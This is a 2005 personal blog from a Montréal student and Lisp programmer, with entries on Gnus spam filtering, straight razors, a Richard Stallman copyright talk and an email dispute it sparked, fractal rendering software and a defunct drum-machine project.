in spam-check-spamoracle. Now we can tell gnus that obvious and suspicious are spam-folders. When we do that gnus automatically marks all the message as spam when we enter those folders. When we quit the folder, message for which we removed the spam mark are moved to our inbox, the other ones goes to the spam folder, aka filter training ground. When by mistake a spam falls in our inbox, the shortcut M-d will mark it as spam. That way our spam corpus is not corrupted even if we get false positives (ie a good email marked as spam) and we can retrain it as soon as we hit a false negative (ie a spam in our inbox), even if we don't feel like checking for false positives at moment. Using tri-state we maximize our time. The obvious folder can be scanned really fast and not too often. The suspicious one is where we look for borderline message that might require instant re-training of the filter. We can also keep a hard-ham and a hard-spam folder for emails that gets wrong classification and re-train the filter twice with those.

This is not to say that gnus is a good email client. I hate it and I still think that all email client sucks. It is only a bit better and lot more customizable than other. Did I mention that it can be set to use an English spell-checker when I send emails to sbcl-devel and a french one when I write to my mother? By the way I don't write that often to my mother since she can't stand how all email clients suck.

2005-08-05 Straight razor

Fur is a great boon that evolution gave to mammals. Fur allows the heat conservation required to be efficiently hot blooded and to and to survive in the coldest weather of this planet. For some strange reason, the fur of humans is rather sparse. This lead to an unconscious association between the lack of fur and the superiority of a life form.

As soon as metallurgy allowed decent blades, humans started to alter their fur to look as less as possible like an inferior mammal. Shaving of the facial hairs was already popular among the ancient Greeks. Today we have advanced metalwork technology and it is a daily routine for many to shave. Nevertheless, it seems like it is impossible to make long lasting razor blades. There is a lot of buzz about the technical innovations in new shaving technology and how smooth and how close a shave can get. We sometimes even hear that a new type of blades might last a bit longer.

The sad reality is that the investment on razor blades is constant if not increasing. Those new blades feature patented technology which prevents cheap alternatives and they are sold the price of a lunch each. To motivate us to try those new and improved blades, they even inflate the price on the old types of blades. The net effect is that we keep using the same blade as long as possible with disastrous consequences for our poor skin.

Why can't we come up with some kind of blade that will stay sharp for more that a dozen shaves ? The sad reality is that razor blade industry is a racket capitalizing on our fear. We've had the technology for blades capable of staying sharp during someone's whole life for the last few hundred years. You hear in every ad that new overpriced disposable blades will prevent you from cutting yourself. By selling overpriced blades, Gillette managed to make more profits in 2005 than Coca Cola.

I got tired of the disposable blades scam so I looked for alternatives. During the renaissance and the industrial revolution we acquired a good mastery of steel work and of metal polishing. The straight razor evolved to the high carbon alloy and biconcave blades that it kept for the last few centuries. This particular configuration is able to make a blade with an extremely sharp edge that is easy to sharpen and with enough rigidity for the safe manipulation of this deadly instrument.

After many years of disposable blades racket it gets hard to find a long lasting razor. Most stores that keep them sells them as expensive curiosity or fine antique artefacts of a long lost past. Even thought the math is simple and you will repay yourself by grabbing this 200$ razor, it is a big initial investment for something you've never tried and that your might end up discarding as too dangerous as they all tell you it must be. After a lot of shopping I found a used straight razor and a hone for 40$. I searched for good tutorials and I made a strop with an old leather belt.

After a few days using the said instrument I must say that I really like it. My first shave was not that close but with some variations on the stropping and the angle of the blade I'm getting results as good as with the disposable crap. The blade is really large and you can cover a lot of skin surface with a single sweeping motion. Unlike with the safety razor you don't have to go on the same area many times. You make a single long continuous pass then maybe another one using another angle. My face is still free of cuts. I have a few cuts on the back of the head, I admit that this tool is hard to use on the areas that you don't see directly in a mirror. People I've talked to tells me that I'll get a much closer shave with a straight razor. Don't let the disposable blades makers scare you, if people willingly shaved daily when the only razor available was a straight razor, this baby can't be that hard to use. A straight razor will stay sharp and it won't scrub your face like a battle field. Forget about this disposable non-sense and get a high tech blade that will stay sharp for a lifetime.

2005-08-03 Huge nuke in the sky

Our Sun as you probably know is a huge ball of plasma surrounding a massive thermonuclear chain reaction. The mass of the whole thing prevents the inner nuke blast from sending most of the "stuff" flying around. The "stuff" is kept there by the gravitational field of the Sun but the insane amount of energy released by the inner core also keeps the outer plasma in constant convection, a bit like how a stove can bring water to a steady boil. Once in a while, a big bubble comes to the surface and launch a big chunk of matter into space. Scientists like to give funny names to huge bubbles of plasma so they call the phenomenon a coronal mass ejection.

Just as if the idea of a giant nuke bringing an colossal amount of plasma to a violent boil and sending matter into space wasn't fascinating enough, SOHO is filming the whole thing for our viewing pleasure. The last week offered a few really brutal coronal mass ejections and SOHO features a breath taking movie of them. Keep in mind that the sun is only the tiny white circle in the middle the video. Earth is nothing compared to those ferocious solar events. Such display of pure power has to fill us with humility. The active region is expected to face us at about the same time as the peek of the Perseid meteor shower which would give us quite a night show and hopefully more of those excellent solar flare movies.

2005-07-29 Lisp porno movies

In one of the chapter of The Mythical Man-Month you see the menu of a restaurant and the caption "Faire de la bonne cuisine demande un certain temps. Si on vous fait attendre, c'est pour mieux vous servire, et vous plaire" which would translate to "Good cooking takes time. If you are made to wait, it is to serve you better, and to please you". It is true that a quick snack can help you to wait and I hope that my fractal zooming movies helped you to wait. Now, the real meal is ready. David Steuber finished rendering his Xeno's Xomo movie! This movies is made with Common Lisp, it took months to render. It is a complete movie with a soundtrack and all.

I hope that this kind of movie stimulate your curiosity for Common Lisp. You are lucky to start now, Marco Baringer just made a great demo of SLIME, the Common Lisp interaction mode for Emacs. In this demo you'll learn some of the tricks that make editing Lisp such a pleasure. After that you'll probably want to code you own web based fractal zoomer so why not grab Marco's demo of UCW, a package for developing web applications in Common Lisp. We are not done yet! You think that Common Lisp is the perfect language already ? You are wrong, but the good news is that making the perfect language for a particular job is pretty easy if you use Common Lisp. Rainer Joswig made a really good demo of a domain specific language using Common Lisp.

Now you must have started your downloads and while you are waiting you think that you should do some googling for a good Lisp tutorial. You can stop searching since Peter Seibel was kind enough to put Practical Common Lisp online for your reading pleasure. "Are we done yet ?" you might wonder. Well... no, I'm afraid there is still more porn to download. Rainer Joswig managed to find some Symbolic Lisp Machines and made some lisp machines videos! That should be enough for now, I'll keep the rest for the desert.

2005-07-25 Censorship

Sometimes, we hear about censorship and we are glade to live in a country where we can express ourself. I'm always glad to live in an area that provides so many opportunities to shout as loud as the big medias. Now we have the net and we can build website with very little resources and skill to spread out thoughts.

But it also happen that some people don't want you to express yourself and they can be very determined to silence you. I was under the impression that I had made a pretty good recap of Stallman's presentation until a strange email appeared in my inbox:

Bonjour,
Je ne sais pas si tu es francophone et je ne parle pas très bien anglais.
Je souhaiterai te rencontrer à titre personnel sur la journée du droit 
d'auteur où Richard Stalmann a pu être invité: je pense qu'il y a des 
informations cruciales qui semble t'échapper quant à l'organisation 
bénévole et rapide sur la mise en place d'une journée telle que 
celle-ci. De même, tu as fait des remarques gratuites et blessantes sur 
ton blog, sur la présence de participants bénévoles qui sont à mes yeux 
inacceptables.

That could have been just a misunderstanding so I replied peacefully:

On July 25, 2005 11:45 am, you wrote:
> Je ne sais pas si tu es francophone et je ne parle pas très bien anglais.

Je suis francophone.

> Je souhaiterai te rencontrer à titre personnel sur la journée du
> droit d'auteur où Richard Stalmann a pu être invité: je pense qu'il
> y a des informations cruciales qui semble t'échapper quant à
> l'organisation bénévole et rapide sur la mise en place d'une journée
> telle que celle-ci.

Avec plaisir.  Où et quand ?

> De même, tu as fait des remarques gratuites et blessantes sur ton
> blog, sur la présence de participants bénévoles qui sont à mes yeux
> inacceptables.

Est-ce qu'on parle de l'article daté du 2005-07-05 sur ygingras.net ?
Je viens de le relire et il m'apparait vide de tous propos
diffamatoire.  Il est vrai qu'il existe des écrits que j'aimerais ne
jamais avoir publié mais celui la n'est pas du tout vitrioleux.  Où
exactement se trouvent les "remarques gratuites et blessantes" ?  J'ai
écris cet article dans le but de remercier Richard Stallman est les
organisateurs de l'évènement, de telles accusations me laissent
quelque peu perplexe.  Il est vrai que je n'ai pas une mémoire
photographique et il est possible que mon résumé ne soit pas tout a
fait exacte.  Mes excuses si mes facultés mnémonique défaillantes ont
blessées quelqu'un.

But it was a mistake, I should I claimed that my spam filter ate the email. I unleashed some frenzy in my correspondent who quickly accused me of vile propaganda and who gave a completely new and distorted meaning to my words:

salut,
> Je suis francophone.
> 
Je m'excuse j'ai vu seulement ensuite que tu étais francophone :-)

>>Je souhaiterai te rencontrer à titre personnel sur la journée du
>>droit d'auteur où Richard Stalmann a pu être invité: je pense qu'il
>>y a des informations cruciales qui semble t'échapper quant à
>>l'organisation bénévole et rapide sur la mise en place d'une journée
>>telle que celle-ci.
> 
> Avec plaisir.  Où et quand ?
> 
Bah, disons dans la semaine, je te recontacterai, je suis assez occupé 
mais ça me dirai bien que l'on se voit. AU café Utopik, 552 st catherine 
Est. depuis la station berri uqam (métro) il y a 2mn, sortie st 
catherine 30m.

>>De même, tu as fait des remarques gratuites et blessantes sur ton
>>blog, sur la présence de participants bénévoles qui sont à mes yeux
>>inacceptables.
> 
> 
> Est-ce qu'on parle de l'article daté du 2005-07-05 sur ygingras.net ?
> Je viens de le relire et il m'apparait vide de tous propos
> diffamatoire.  Il est vrai qu'il existe des écrits que j'aimerais ne
> jamais avoir publié mais celui la n'est pas du tout vitrioleux.  Où
> exactement se trouvent les "remarques gratuites et blessantes" ?  J'ai
> écris cet article dans le but de remercier Richard Stallman est les
> organisateurs de l'évènement, de telles accusations me laissent
> quelque peu perplexe.  Il est vrai que je n'ai pas une mémoire
> photographique et il est possible que mon résumé ne soit pas tout a
> fait exacte.  Mes excuses si mes facultés mnémonique défaillantes ont
> blessées quelqu'un.

Une personne de notre association qui a participé à l'organisation de 
l'événement, c'est sentie blessé sur ce que tu as écrit sur ton blog, et 
moi aussi:

 >> >  You could even see hippies advocating the benefits of homegrown
 >> > berries  and comic writers debating about the proper inking
 >> > techniques. »

Tu es évidemment libre d'écrire ce que tu veux, c'est presque cocasse le 
côté "hippies", mais là ou c'est vexant, c'est que nous oeuvrons dans 
l'économie responsable. Cette journée a été organisée que par des 
bénévoles. Et là, toi tu "critiques" des initiatives positives, 
gratuites et pour le bien de tous " You could even see hippies 
advocating the benefits of homegrown berries and comic writers debating 
about the proper inking techniques. »
Quitte à critiquer quelqu'un ou quelque chose, critique le système mais 
pas nous!!!!!

Moi, je viens de France, je suis à montréal et j'ai déjà vécue quelques 
années ici. Et je suis tous les jours choquée de voir la culture nord 
américaine baignée de pensée unique. C'est très triste.

Le stand qui proposait des fruits était gratuit, la conférence gratuite 
et faite avec les "moyens du bord". Le stand que tu as qualifié de 
"comic writers debating about the proper inking techniques" représente 
un collectif de travail bénévole en veille juridique, technique et 
politique.

C'est comme si tu critiquais le service de protection du consommateur!!!
Tu vois ce que je veux dire? :-)

Tu écris également :"Strangely, most of them were not from hardcore geek 
groups."

Je sais que tu es jeune et que les enjeux du Libre vont du technique au 
juridique et au politique. Et que c'est difficile de tout saisir.
Mais si tu pensais trouver une bande de geek qui allait encenser 
Stallman, dommage pour toi. Les gens du libre sont des gens qui 
s'implique au quotidien et il n'y a rien de drôle la-dedans. On est 
juste heureux de se retrouver :-)
De plus, on ne paniquait pas du tout de ne pas voir arriver Stallman à 
l'heure (chose que tu as écrit). Sache que notre collectif l'hébergeait 
depuis plusieurs jours à domicile. On voulait juste que l'horaire soit 
respectée à cause de la location de la salle et les invités.
Renseigne toi un jour sur combien coute de faire venir richard stallman 
et assied toi ;-). C'est un petit cadeau que l'on vous a fait. 
D'habitude il est cher à faire venir et les entrées sont payantes.

"Strangely, most of them were not from hardcore geek groups." J'ai 
organisée une conférence dimanche dernier sur les femmes et le logiciels 
libres. Ceci pour te dire que le libre n'est pas l'apanage des hommes et 
des geeks. C'est ce qui a valu la chute de l'ancienne association à Quebec!
Durant cette journée de conférence, on n'a pas parlé de cyberféministe 
mais des moyens de soutenir le libre dans l'éducation, le secteur 
public, les cafés, les bibliothèques. Nous avons montré que les femmes 
étaient très actives dans le développement local responsable dans le 
monde et sur tous les continents, et elles utilisent du libre, et elles 
sont proches des discours de la FSF. On ne s'arrête pas au discours OSI, 
on construit, on avance. http://www.######.###/article####.html

A bientôt ;-)

You can guess that I find this last wink a bit scary. Somehow it seems that my description of the event have been turn into a form of negative commentary by some out of context quotations in triple email forwarding. The most obvious distortion is the reference the comic writers. Supposedly I have criticized some volunteer legal watchdogs by calling them "comic writers". You can see from this website that in the original article "comic writers" is a link to the work of Frédéric Guimont who was at the event and with whom I personally discussed inking techniques.

I really don't know what to think about this message. It is hard to believe that my original article could get so much distortion that it can spawn such a fiery reaction. Maybe some vigilantes want to turn my writing to their bibbing. Perhaps they only want to hone their intimidation process on a harmless pal like me. I must admit that I'm a bit scared but not enough to stop writing. To all my fellow bloggers, don't give up the fight, they can't silence all of us!

2005-07-05 Richard Stallman at UQAM

We had the pleasure to hear a talk by Richard Stallman of the Free Software Foundation on copyrights. The event was organized by many volunteers. Strangely, most of them were not from hardcore geek groups. You could even see hippies advocating the benefits of homegrown berries and comic writers debating about the proper inking techniques.

The first part of the event was featuring various kiosks by several organizations active in the Montréal area. There was my former employer, several GNU/Linux user groups and few free speech activists. There was not many visitors. Given the lack of prior notification that was understandable but still disappointing. Nevertheless, it was fun to see former coworkers again. I finally had the occasion to brag about by new π memorization skills. At university, I'm affiliated with the LaCIM, the lab Simon Plouffe was affiliated to when he came up with his formula for the computation of digits of π. Simon Plouffe is also a former world record holder for remembering digits of π so I don't impress anyone there.

The second part was something else. The large auditorium was filled at capacity. I would say over 300 attendees. You could see GNU and penguin shirts everywhere. You could also see a lot of older people and even a few suits. There was a little delay, as expected with any presentation, and a bit of panic. What I understand is that the organizers lost track of Richard Stallman. Then he entered the room, irradiating with his strong charisma. You can read about that in Free as in Freedom but to see it in reality is something. Everyone stopped talking and every look was locked on his eyes.

He started his presentation with a small history of Free Software, the fundamental rights and why software is different from chairs and other physical objects. He was talking with a really good french. Some people live in Montréal all their life and never manage to speak french that well. He only inquired a few times about the proper terms to use. This is written in many places but RMS started the GNU project when he saw the world of software starting to take away from the users fundamental rights. The right to use the software however you like, the right to study it, its internals and how it works and to modify it, the right to help you neighbors, by redistributing the software and the right to redistribute a modified version of the software.

Software is different because you can share it without loosing it. Software is different because you can hide how it works. The version of the software that you use if the version that only the computer can understand. To see how the software works and to adapt it to your need, you need its source code. If a toaster is not pleasing you, you can take a screwdriver and you can take it apart. You don't need the blue print to do so. But the talk was not about Free Software so RMS proceeded with copyrights.

In antiquity and in the middle age, the skill required to use a book was also the same skill required to reproduce it. The reader of a book could reproduce it just as easily as the original author and to reproduce 100 book was 100 times as long as to reproduce a single book. If you wanted Euclid's Elements and you were not living in Alexandria, you had no hope to find Euclid and to ask for a copy of his book. You had to find someone who had it and either to borrow the book from him to make you own copy or to convince him to make a copy for you. Euclid had not much to gain by knocking at every door to find if you had copied his book. Euclid probably had something better to do than to do all the copies himself. Books were written, authors had a motivation, sharing knowledge and stories is part of human nature. We have made it for thousands of years.

Things started to change with the printing press. With the printing press, you had an enormous price to acquire the equipment and a long setup to could typeset a book but once your plates were ready, you could print as many copies as you liked in a relatively short time. Nevertheless, it was not all kinds of work that benefited dramatically by the printing press. You need to print enough copies to account to the time spend to typeset the plates. So a print-shop could decide to print a book and the author would get nothing while the print-shop would sell hundred of copies. This is not theft, the print shop does not prevent to author to continue to sell his own hand made copies or to open his own print shop.

Some prestigious authors managed to influence rulers in granting them monopoly for the reproduction of their own work but it was on case by case basis at that time. Around the 18th century, we started to see official copyright laws. That way, it was thought that by restricting the rights of the public for a limited time, the authors would gets more motivation to write more books for the greatest good of all. Manual copying was still going on for niche market works and for really poor people. Manual copying was not targeted by these laws were meant to prevent to abuse by print-shops. A manual copyist cannot abuse much and the laws were easy to apply since print-shops had to advertise what they were planning to sell.

The public was giving away a fundamental right, the right to share and to communicate its knowledge but it wasn't taking away too much, only the right to share with a printing press that most people didn't have. But the technology continued to progress. Now most people own devices capable of better reproduction than a printing press. Now the public has something to loose. During the time of the printing press, the power shifted relatively fast from the authors to the editors. The author had an exclusive monopoly on his work but there were many authors and not that many print shops. The print-shops were not to agree to print your book and to give you royalties if you were to bypass them by also dealing with another print-shops.

The situation that we have now is that the editors always require to get the exclusive copyright from the author. The law that was supposed to limit the power of the editors and to protect the authors made the editors more powerful. The ones who are lobbying revisions to the copyright laws are the editors, not the authors. They have a strong propaganda machine and they claim that they do it for the starving authors. The reality is that the editors keep the authors in starvation.

To get a record contract, a band must assign its copyright to his record company. The record company will negotiate a royalty rate that will be around 4% of the retail prince. The record company will consider that recording, mastering and producing the record is an advance on the royalties. Most bands won't sell enough record to get passed this advance and they won't receive a single penny from the disc sales. Why do band still sign record contracts ? Because of the payola. Record companies are "well plugged" with radio stations. Many were sentenced for using illegal means for convincing radio stations to play selected records. Bands sign record contracts so they can get the promotion they need to have people in their shows, where they can make real money. Even if bands would like to let you download their songs, the copyright is not their anymore, the record company decides what you can do with the music.

We have reached a technological point where we don't need the record companies anymore. If you like a band and you share its music as much as you can to get them promotion, and you send this band one dollar, you have sent them more money than they would have get if you had bought a record from a store. Given the technological context, giving exclusive reproduction rights to the editors is not the good deal it was in the time of the printing press. The author gets screwed because he doesn't get has much as he deserve and the public gets screwed because he lose a right that he has the mean to exercise, a right that would give the public more happiness without taking away anything from the author.

The editors have at least one point right: we need to review the copyright laws. But not to give them more right, we need to take back our rights. The government should not serve to protect the business model of obsolete middlemen, it should serve its people. What Richard Stallman propose is a short term copyright. He think that ten years should be enough for an editor to cover the setup fee of typesetting and printing books, to cover the research of reference manual and to cover for the studio time of records. Indeed, most works are out of print long before that ten years delay. Editors don't care to provide you with a publication but they still want to prevent you from getting it from an individual who already has it. RMS must admit that he heard some protest from authors. A prized author once told his that ten years was way to much and that five years is as long as a work should be covered by copyrights. Editors claim that they need 90 years to fully recover from their investment. The reality is that they want to prevent you from using public domain work, work that they prevent from being available so that can sell you something else.

Richard Stallman also realize that not every piece of human work should be shared the same. Every piece of published work falls more or less in one of the three categories: utility and reference work, like computer programs and dictionaries, work expressing the ideas of someone, like essais, and entertainment. In all the cases, private non commercial verbatim copies should be allowed. A non commercial copy takes nothing away from the author and to prevent it would requires a police state that slams doors to perform full cavity searches, or at least who seize your computer or who install government sponsored spyware programs.

It should be possible to modify and to redistribute utility and reference work, maybe after a short delay. That may require that the government come into play and ensure that the source code of programs if made available for the public. It makes sense to allow only verbatim copies of works expressing the ideas of someone like essays. On the other hand, after a delay it should be possible to make work based on an entertainment work by someone else. This form of folklore is dominant in master pieces of the past. You can think of Lord of the Rings that is more or less an modern retell of Der Ring der Nibelungen which is also a germanic retell of the traditional Norse legend of Sigurd the Dragon Slayer.

Richard Stallman invites us to make a lot of noise. We can blog about copyrights and we can organize meeting for ultra geeks but thats now how we will reach that public. If we don't have the public, the government can afford not to listen to us. We must go down in the streets, possibly picketing in front of record stores.

There was a panel with invited speakers after the talk but we needed to clear the room for 22h so there were not many interesting questions. There was a bit of flaming among the speakers, quite sad. RMS reminded us that we often forget to give credit to all the GNU hackers when we refer to the GNU/Linux operating system as "Linux". He also highlighted that we are a bit victim of propaganda from companies like IBM who prefer to talk about the quality of "open source software" instead of talking about the freedoms protected by Free Software. Thanks again to Richard Stallman and to all the organizers! If you were shaken by the ideas in in this speach, don't forget to become member of the FSF so I get my free voice mail message. ; )

2005-07-03 π

When you read that the human brain can recall 83431 digits of π, you ask yourself many questions. What is the process of learning all those digits? How can you recall where you are after 10 hours of recitation? How do you "see" the number in your head?

The discussion on /. gave a few tricks for memorizing digits and I decided to try myself. I made a really simple trainer that groups the digits by blocks of 10 and color code them. I already feel some improvement with the color code. I can recall the block transitions and it helps to "know where I am".

2005-06-25 Fireworks

The weather was really painful today in Montréal. Humidity was over 85% and temperature climbed at 32 Celsius degrees. Needless to say that there was a visible smog. I was hiding from the weather in the comfort of UQAM's AC when I saw the t-15 fireball announcing the imminent start of the fireworks. It was a big green ball over the bridge, the air was so heavy that there was a big halo all around it. The sky had faded back to black before the bang could reach my observatory. I was disappointed that I forgot about the show but a quick look at my watch confirmed that still could make it so I dared to sprint on my bike across the Saturday night traffic in the damp weather.

The weather was painful but it was perfect for such a show. I arrived just on time, dripping sweat like a marathon runner. Tonight's fireworks were particularly great. The high humidity could carry all the sounds with a strong echo and the smog was inflamed in an eerie aura with every flash. Tonight's contestant was France. They did In the Hall of the Mountain King. You could feel the climax coming with great low altitude ground work. There was spiraling strait traveling rockets, alternating colors and each time climbing higher and higher. Then then the fireballs, many simultaneous big and bright fireball with the loud echo of the bangs. Some people even started to leave thinking such a climax could only be the final.

Fortunately it was not. It soon came to Temple of Love, the (1992 ?) version with the female signer. There was solitary small really bright flashes. Alone that part could have been boring but it followed the music nicely until the lyrics came to "fire from the fireworks up above me" and the sky was filled with heart shaped fireballs for a few minutes. The show went on with mini climaxes and we would not see a particular kind of rocket being over used. Every song hand a dominant type of fireball and groundwork. The final was jaw dropping. The width of the St-Laurent was covered with simultaneous explosions. You always see a few really large ones for the final but this time it was more than that, it was like a non-stop bang with multiple smaller fireballs while the bigger ones were expanding. I'm happy to have dared the weather, it was well worth it.

2005-06-21: Blown up video card

Since I decided to use XMMS as my alarm clock, I've put a lot of pressure on the stability of my workstation. There are no big problems here since I'm using Debian GNU/Linux. Note that some features are missing from the XMMS alarm plug-in like snooze and and stuff like that. But back to the story, I was in my bed, fully awake, with the sun flowing from behind my curtains.

No possible doubt, my trusty system did not wake me up. What a shame, it was not a power failure or a bad setting from me, it was crashed. It went back up without problems but only to crash a few hours latter with big ugly vertical stripes on the monitor. When I rebooted it, the stripes were still there at the BIOS prompt. Easy diagnostic: dead video card. My system is back on track with a crappy PCI card from the emergency spare parts bin.

Gauging by the smell of the card, it is roasted. Even if spare fans were available that would not save it. Why is that so? Why can't a 400$ card come with a decent ball bearing fan? I have the fan on my 200MHz still running, event with all the lint tightly packed in the heat sink. I have six years old 5$ case fans still running. When the heat sink on the CPU got clogged by lint, the system crashed but the core did not melt. Thats my second roasted video card with that six years old system.

Thats what you get with a "gamer" card: crap. They make it cheap because they expect you to move to a bigger card as soon as you can. Next time I'll get a 50$ card with open specs and free software drivers for GNU/Linux. I'll get one without a heat sink, one not designed to melt as soon as the warranty is over.

2005-06-03 Sans-FEUQ Wiki

The FEUQ is an provincial "student union union". It is to blame for the miserable ending of the 2005 student strike. My student union, AESS, will have a referendum next semester on the possibility to stop being a member of the FEUQ. I made a Sans-FEUQ Wiki for the disaffiliation promotion committee.

2005-04-28 Planed Lisp'd

Once the Fract Movie Pack 1 was rendered, Zach Beane offered to host a torrent. Fract is now featured on Planet Lisp! Since that means that I get a lot of instant hits, I had to take the other movies offline. Do not despair, you can now grab the Movie Pack 1 torrent and get 20 high resolution movies for the same price!

update: The traffic is almost back to normal so you can hammer the old movies again.

update: The torrent is gone. Many gigs were uploaded, something I could not have handled alone. Thanks to everyone who seeded! You will have to wait for the Movie Pack 2 if you didn't get the torrent while it was up.

2005-04-25 Fractal Zooming Movies

I had to opportunity to have a chat with David Steuber, a truly dedicated fractaler. David have been rendering frames for his new fractal movie for the last few months. After I watched his first movie, I wanted more so I added the movie support to Fract. It's basically the same thing as the zoom trail but with many times more frames and a file numbering that helps the encoder. The Fract generated fractal zooming movies are from spots in the scoreboard, I may add automatic movie rendering for the top rated regions in the future.

2005-04-21 Anti-aliasing and Takeover

I added anti-aliasing to Fract. For regular images, anti-aliasing is best done by averaging a grid of sub-pixels. For the Mandelbrot Set, dividing a pixel into sub-pixels actually increase the probability of falling into a punctually detailed region. A solution found by SunCode on sci.fractals is to keep only the minimal escape value of all the sub-pixels. The result is great! Unfortunately a 3x3 sub-pixels grid is 9 times slower to compute so I'm not likely to add anti-aliasing to the Web interface unless I receive some hardware donations.
; )

In the mean time someone called Lahvak decided to take over the top 10. In the last few days he submitted several great regions. Many of them made it to the top 10. Lahvak now rules more than half of the top slots. Congratulations Lahvak!

With the trail feature, I could notice a trend. Many of the best regions originate from the tail or somewhere behind a random cardioid. Also, most of the top 10 is dominated by the funky-2 color map. This either means that this one is particularly great or that all the other maps are really ugly. I fear the later case so I'll try to make a few other maps.

2005-04-17 More Gears

Many really interesting regions were submitted and many votes helped to sort them out. The top region (dropped to second as I write this) was promoted to t-shirts. I made a few tweaks to the color map in order to blend it to white. As usual, I made a hi resolution render with a several orders of magnitude more iterations, 1000 times more colors and anti-aliasing. You can get the new gears from the EU and US Spreadshops or from Cafe Press.

Thanks to everyone who submitted regions and who voted!

2005-04-12 Back to School

The student strike is now over and it's time to get back to work. In all of my courses, teachers were collaborative about the how to arrange the calendar, assignments and exams. All but one, Philippe Gabrini decided that strikers were not worthy of his collaboration.

2005-04-10 Gradients and Partial Iterations

After a few submission to the voting boot I realized how ugly my color maps were. I decided to tweak them a bit but they were still ugly so I looked for an alternative. Gimp gradients were my first stop and I'm really pleased by the result. The file format is undocumented but really simple. The gradient editor in the Gimp really lacks a undo but except from that it was just what I needed. The gradients shipped with the Gimp are not really adapted for fractals but I made a few of my own with interesting results.

With multiple gradients inside a single color map, the color step from one iteration to the other is more apparent. I found an interesting article talking about using the modulus from the last iteration to compute partial iterations. The result is impressive. One draw back is that it requires a bit more precision to compute the partial iteration so we lost a digit of freedom on the zoom and a few interesting submissions from the voting boot.

2005-04-09 Fract 0.5.9

The latest Fract is out. It is now possible to now move interesting regions in the voting boot and to download wallpaper sized images. Xach improved Salza again, it's now almost two times faster. The bottle neck is now in Poly-pen. I can get rid of the CLOS dispatch time with some declarations but there is still too much consing. The construction of a point at every pixel is quite sub-optimal. I expected it to come to haunt me one of these days.

It was a good move to add user voting. Only a few hours after the release people are already finding spots that I never saw before. The next step will probably be user comments unless popularity forces me to fix the consing. I'm still not pleased with the color maps. The zoom independent color maps is much better but I still see places where a single tone is dominant. It's sad since those places are usually filled with interesting details. Maybe there is not one size fit all for color maps and I'll have to add a bundle of them.

2005-03-27 Posters

The Québec student strike goes on and I managed with the help of the activity committee to put together a poster representing the scientists on strike. We printed a few 5 foot tall posters and to our amazement, some people wanted buy it. So we asked everyone who have content on the poster if it was OK with them. If you are interested, you have two options: you can either go straight to the AESS to get a 5 foot print on the spot or you can hit my web store to order 35 inches print by mail. All the profits are sent to the Strike Fund. Don't wait too long, we won't offer the poster after the strike.

2005-03-15 Black T-Shirts

I managed to get black t-shirts, you can get them from either my US SpreadShop or my European SpredShop. Those looks great with Zachery Bir's save-lisp-and-die logo but unfortunately I can't have fractals on them, at least for now. Dark shirts only support two color vector graphics so I'll have to do some major hack if I want to render fractals for them. Do not despair, this is doable, it only takes a bit more thinking.

2005-03-14 More Colors

Zach Beane made yet another fast image writer. This time we have PNG. If we can get 24-bit colors for free, better use lots of them! So now we run at 1024 iterations. The set looks great when you crank up the iteration count and the progressive color map it well suited for playing with the iteration count. I only lowered the progression factor a bit since we tend to zoom more now. I'll probably have to switch to double floats soon. The black pixels are starting to get really expensive, we clearly see that images with lots of black takes a while to render. I'll try to detect cycles, that should speed up things a bit. Maybe we can crank it up to 2048...

2005-03-13 Progressive Color Map

I finally changed the color spiral map to follow a logarithmic spiral path. The effect is simply great ! At high iteration count, the edge of the set gets more sharply defined but there is a large variation in the number of iterations required for escape while further away from the set this variation is almost linear. With the linear color map, cranking the iteration count would yield a better defined set but only a small portion of the edge near the set would receive most of the color shades. With the new progressive color map, the edge near the set receive color shades that progress slowly while the parts far from the edge end up with fast progressing shades. Take a look at it in action: the old color map has only a few colors far from the edge while the progressive map spreads the colors evenly across the whole image.

2005-03-07 Fractal Gears

You've been numerous to suggest high resolutings images on t-shirts so I've put some of them on a CafePress shop. The basic store deal limits the number of items I can offer but if you find great spots that are t-shirt worthy, let me know, I'll update the products.

2005-03-07 Releases

I finally got bored by the primitive navigation in Fract so I added re-centering by clicking. Fortunately when I asked the people on #lisp if it was good enough they told me that it was too slow. If they hadn't I could have left it with the tiny little 100x100 image. Since Xach had just finished his GIF writer he proposed it as an alternative to CL-SDL which is quite fast but only saves to BMPs.

Skippy, the GIF writer, only does point operations but thats exactly what I needed (and makes coding the Poly-pen back-end a lot less work). Poly-pen proved it's usefulness since I was able to switch the back-end in Fract without any trouble for the greater good of the greater number. Xach's back-end is in pure Lisp, I think crossing the UFFI takes a lot of CPU cycles since I was able to double the image size while reducing the rendering time. One of these days I should code some benchmark suite for all the back-ends in Poly-pen.

So you can now enjoy Poly-pen 0.3.1 featuring improved histograms and a new ultra-fast back-end for GIFs and Fract 0.5: faster with bigger images and improved navigation!

Enjoy!

2005-01-23 OBB's Postmortem

If you went to the OBB's website recently, you probably haven't noticed anything new. OBB went from nothing to 0.7 (the last release with major features added) in a relatively short time span: ~6 months. The fact that we couldn't come up with any new stuff in over a year should be seen at the confirmation that the project is dead. After a few beers with Vince, we came to the conclusion that we probably wont come up with new features and that it was time move from OBB to something else. Let's take a moment to see what was good and what was wrong with OBB.

A long time ago, Vince suggested that we code a beat box for GNU/Linux. I had never used a drum machine before but I knew how to make custom graphics dance on the screen so I was convinced that I could make something that looked nice. It took us some time to get started, we wanted to see what technology was available. I didn't want to do raw input management with SDL but I didn't want ugly rectangular widgets like in all the hi-level toolkits either. The goals were:

  • portability
  • impressive GUI
  • plug-in type sound-effects

Looking at successful drum machines, that seemed like the key to success. We needed to be portable because our target platform was GUN/Linux but there was almost no audio-tools for GNU/Linux back then so we needed to attract audio artists on what ever platform they were using. We needed impressive GUI: there was no drum machine out there with a plain GUI. I don't know why, technically a plain GUI would eat up less CPU cycles and free resources to make more sound effects. Who cares if your tools are ugly, we wont see them on the CD. Ok, thats not entirely true, trackers are popular and extremely ugly. Finally, we needed plug-ins for sound effects. I'm not too why sure why either but that was a common feature of popular drum machines.

For maximal portability, we went for Python, Qt and CSound. If you've ever spent 20 minutes looking at a compiler output just to test some basic feature you added, you know why we went for Python. It is also really painful have a build system to work on both Windows and GNU/Linux though Qt helps a lot. Qt provides all the input support and let you do all the drawing by hand if you don't want to use the QWidgets. CSound is a really powerful batch file synthesizer. That setup is optimal for rapid application development, the plan was to show an array of pretty buttons, read their on/off state, write batch file to disk, call CSound and write the result to /dev/audio.

